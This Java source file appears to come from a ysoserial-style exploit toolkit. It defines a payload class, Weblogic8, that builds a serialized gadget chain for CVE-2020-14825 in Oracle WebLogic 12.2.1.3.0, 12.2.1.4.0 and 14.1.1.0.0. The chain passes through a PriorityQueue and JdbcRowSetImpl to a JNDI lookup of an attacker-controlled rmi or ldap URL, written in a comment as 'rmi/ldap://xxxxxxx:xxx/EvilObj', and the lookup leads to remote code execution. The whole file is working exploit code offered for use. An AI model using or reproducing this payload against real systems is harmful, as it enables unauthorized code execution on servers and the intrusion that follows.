package payloads;

import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.util.comparator.ExtractorComparator;
import common.Serializerable;
import oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
import payloads.annotation.Authors;
import payloads.annotation.Dependencies;
import util.PayloadRunner;
import util.Reflections;

import java.util.PriorityQueue;

// Command: rmi/ldap://xxxxxxx:xxx/EvilObj
// CVE-2020-14825

@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"weblogic:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0"})
@Authors({ Authors.CCKUAILONG })
public class Weblogic8 implements ObjectPayload<Object> {

	public byte[] getObject(final String command) throws Exception {
		MethodAttributeAccessor accessor = new MethodAttributeAccessor();
		accessor.setAttributeName("x");
		accessor.setIsWriteOnly(true);
		accessor.setGetMethodName("getDatabaseMetaData");
//        accessor.setGetMethodName("connect");        //与上面的getDatabaseMetaData基本等效

		LockVersionExtractor extractor = new LockVersionExtractor(accessor,"");

		JdbcRowSetImpl jdbcRowSet = Reflections.createWithoutConstructor(com.sun.rowset.JdbcRowSetImpl.class);
		jdbcRowSet.setDataSourceName(command);

		PriorityQueue<Object> queue = new PriorityQueue(2, new ExtractorComparator(extractor));
		Reflections.setFieldValue(queue,"size",2);

		Object[] queueArray = (Object[])((Object[]) Reflections.getFieldValue(queue, "queue"));
		queueArray[0] = jdbcRowSet;

		return Serializerable.serialize(queue);
	}

	public static byte[] getBytes(final String command, Boolean fusion) throws Exception {
		return Weblogic8.class.newInstance().getObject(command);
	}

}
